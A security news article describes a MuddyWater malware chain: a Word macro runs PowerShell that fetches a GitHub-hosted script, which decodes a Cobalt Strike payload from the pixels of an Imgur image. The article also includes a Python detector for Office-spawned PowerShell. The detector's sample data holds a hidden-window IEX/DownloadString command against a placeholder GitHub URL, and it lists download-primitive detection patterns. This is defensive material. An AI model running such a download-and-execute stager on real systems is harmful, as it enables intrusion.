A new malware strain has been discovered that uses Word files with macros to download a PowerShell script hosted on GitHub. That script in turn downloads a legitimate image file from the image-sharing community Imgur, which is then decoded into a Cobalt Strike script on Windows systems.
What has happened?
The malware strain is linked to a state-backed (APT) group known as MuddyWater. The malware spreads with an embedded macro within a legacy Microsoft Word (*.doc) file.
- Once the Word document is opened, it executes the embedded macro. The macro then launches powershell[.]exe and passes it the location of a PowerShell script hosted on GitHub.
- The single-line PowerShell script downloads a genuine PNG file from Imgur and uses the downloaded image's pixel values to compute the next-stage payload.
- Hiding payloads within an ordinary image is possible using Invoke-PSImage. This tool encodes a PowerShell script within the pixels of a PNG file, along with a one-line command for executing the payload.
- The malicious payload communicates with the C2 server using the WinINet module to obtain further instructions. However, the C2 server is no longer accessible.
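The chain above (Office application spawning powershell.exe, which fetches a stager from public hosting) is visible in process-creation telemetry. The following is an added detection example, not code from the original article or from any of the tools it names; it runs over constructed Sysmon-style event records, and the hosting URL, process IDs and paths are placeholders.

```python
"""Flag the macro-to-PowerShell stager chain described above: an Office
process spawning PowerShell whose command line downloads remote content.
Event fields mimic Sysmon Event ID 1 (ProcessCreate); all events here are
constructed samples, not real telemetry."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Download/execute primitives typical of one-line stagers (label -> regex)
DOWNLOAD_PATTERNS = {
    "DownloadString": r"downloadstring", "DownloadFile": r"downloadfile",
    "Invoke-WebRequest": r"invoke-webrequest|\biwr\b",
    "Net.WebClient": r"net\.webclient", "IEX": r"\biex\b|invoke-expression",
}
# Public hosting services the article names as abused (not an exhaustive list)
ABUSED_HOSTS = ("raw.githubusercontent.com", "github.com", "i.imgur.com", "imgur.com")

def assess_event(event):
    """Return reasons the event matches the stager pattern; [] if none."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "").lower()
    reasons = []
    if parent in OFFICE_PARENTS and image in POWERSHELL_IMAGES:
        reasons.append(f"{parent} spawned {image}")
        if re.search(r"-(enc|encodedcommand|e)\b", cmd) or re.search(r"-w(indowstyle)?\s+hidden", cmd):
            reasons.append("hidden/encoded PowerShell flags")
        hits = [label for label, rx in DOWNLOAD_PATTERNS.items() if re.search(rx, cmd)]
        if hits:
            reasons.append("download/execute primitive: " + ", ".join(hits))
        for host in ABUSED_HOSTS:
            if host in cmd:
                reasons.append("fetches from public hosting: " + host)
                break
    return reasons

def scan(events):
    """Return (ProcessId, reasons) for every event that matched."""
    flagged = []
    for event in events:
        reasons = assess_event(event)
        if reasons:
            flagged.append((event["ProcessId"], reasons))
    return flagged

SAMPLE_EVENTS = [  # constructed: one stager-like event, two benign ones
    {"ProcessId": 4012, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EXAMPLE-PLACEHOLDER/stage.ps1')\""},
    {"ProcessId": 4020, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"ProcessId": 4031, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Only the Word-spawned PowerShell with a hidden window and a GitHub download is flagged; the interactive PowerShell under explorer.exe and the printer helper spawned by Word are not.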
Abusing legitimate services
Abusing legitimate services, such as GitHub, has become a common attack method.
- Recently, the Gitpaste-12 worm was spotted abusing GitHub and Pastebin to host its malicious payload and evade detection while targeting web applications, IP cameras, and routers.
- TroubleGrabber malware was also observed using Discord and GitHub to download next-stage payloads to victims' machines.
Using legitimate services such as GitHub and Imgur allows cybercriminals to mask their tracks without any major investment. Experts therefore suggest that organizations guard against such attacks by training employees to identify phishing emails, disabling macros where they are not needed, using reliable antivirus software, and keeping all software patched and up to date.